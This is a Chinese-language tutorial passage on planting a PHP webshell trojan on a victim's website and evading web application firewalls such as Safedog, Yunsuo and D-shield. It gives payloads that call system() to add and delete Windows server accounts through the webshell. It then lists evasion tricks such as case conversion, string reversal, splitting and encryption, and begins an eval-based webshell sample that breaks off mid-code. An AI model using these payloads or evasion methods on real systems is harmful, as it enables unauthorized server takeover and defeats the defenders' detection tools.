目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。
攻击者希望执行:
创建服务器用户:
key=echo('<pre>');system('net user a a /add');
删除服务器用户:
key=echo('<pre>');system('net user a /del');
那么在被害者网站服务器上安装有应用防火墙的情况下应该如何让木马文件不被检测删除呢?即怎么绕过安全检测软件如ByPass安全狗、云锁、D盾等。这里以安全狗为例进行绕过:
先概括一些绕过方式:
1.文本查杀绕过:
大小转换strtolower()
文本颠倒strrev()
文本分割
干扰函数echo/print_r/var_dump
加密
语言特征function/class
2.动态执行查杀绕过:
加密传输
改变传输特征
一、利用Php函数特性 + 大小转换 绕过:
1.php:
<?php
$a = "eVal";
$b = strtolower($a